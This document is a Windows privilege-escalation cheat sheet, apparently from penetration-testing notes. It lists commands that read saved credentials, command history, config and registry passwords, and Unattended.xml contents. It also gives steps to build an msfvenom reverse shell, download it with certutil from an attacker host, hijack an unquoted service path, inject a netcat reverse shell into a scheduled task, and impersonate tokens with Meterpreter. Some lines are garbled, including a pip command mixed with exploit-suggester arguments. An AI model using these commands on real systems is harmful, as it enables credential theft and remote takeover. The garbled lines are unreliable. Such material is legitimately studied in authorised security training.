Privesc Checklist

powershell -c "Get-Service"
Return services.

Return Scheduled tasks.

cmdkey /list
List saved credentials (can’t see password).
runas /savecred /user:admin powershell.exe
Run a program with saved creds.

type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
Show CMD history.

type $Env:userprofile\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
Show Powershell History.

type C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config | findstr connectionString
Search for database password in IIS config.

reg query HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions\ /f "Proxy" /s
Look for Putty credentials in registers (SimonTatham is PuTTY’s creator).

Automated Scripts


. .\PowerUp.ps1


On target


On attacker machine

pip install xlrd==1.2.0 --update --systeminfo systeminfo.txt --database [DATE]-mssb.xls


winPEASx64.exe Run WinPEAD


WiseBootAssistant( - Wise Boot Assistant)[C:\Program Files (x86)\Wise\Wise Care 365\BootTime.exe] - Auto - Running - No quotes and Space detected YOU CAN MODIFY THIS SERVICE: AllAccess

On attacker machine

msfvenom -p windows/x64/shell_reverse_tcp LHOST=[ATTACKER_IP] LPORT=[ATTACKER_PORT] -f exe -o Wise.exe
Create a reverse shell with the name of the modifiable service.

nc -lvnp [ATTACKER_PORT]
Open a listener.

On target machine

cd "C:\Program Files (x86)\Wise"
certutil.exe -urlcache -f http://[ATTACKER_IP]:[ATTACKER_PORT]/Wise.exe Wise.exe
Download crafted executable and place it where the space is in the vulnerable path.

sc.exe stop WiseBootAssistant
sc.exe query WiseBootAssistant
sc.exe start WiseBootAssistant
Restart the service to execute the crafted one.


Set-ExecutionPolicy Bypass -Scope process -Force
. .\PrivescCheck.ps1


Abusing Schtasks

Show Schtasks

schtasks /query /tn vulnerableTask /fo list /v
Show detail info about the scheduled task.

cd c:\Program Files (x86)\SystemScheduler\Events
type [ID].INI_LOG.txt Show tasks logs.

Replace executable

mv excutedByTask.exe excutedByTask.exe.bak
mv msfvenomeReverseShell excutedByTask.exe Replace exe that being executed by scheduled tasks.

Inject scheduled task

echo c:\tools\nc64.exe -e cmd.exe [ATTACKER_IP] [ATTACKER_PORT] > C:\tasks\schtask.bat
Inject scheduled task with reverse shell.

Abusing Privileges

Here are the most commonly abused privileges:

  • SeImpersonatePrivilege
  • SeAssignPrimaryPrivilege
  • SeTcbPrivilege
  • SeBackupPrivilege
  • SeRestorePrivilege
  • SeCreateTokenPrivilege
  • SeLoadDriverPrivilege
  • SeTakeOwnershipPrivilege
  • SeDebugPrivilege

whoami /priv
Show current user privileges.

SeDebugPrivilege and SeImpersonatePrivilege

When SeDebugPrivilege and SeImpersonatePrivilege are enabled, we can impersonate another user.

load incognito
list_tokens -g
List tokens.

impersonate_token "BUILTIN\Administrators"
Impersonate token.

To determine rights, Windows uses the Primary Token of the process and not the impersonated token. So we have to migrate to a process with correct permissions.

The safest to pick is services.exe.

migrate 668
Migrate to process 668.

Unattended Path

Unattended Setup is the method by which OEMs (Original Equipment Manufacturers) install Windows NT in unattended mode. C:\Windows\Panther\Unattend\Unattended.xml is where users' passwords are stored in base64.

type C:\Windows\Panther\Unattend\Unattended.xml
Display unattended password.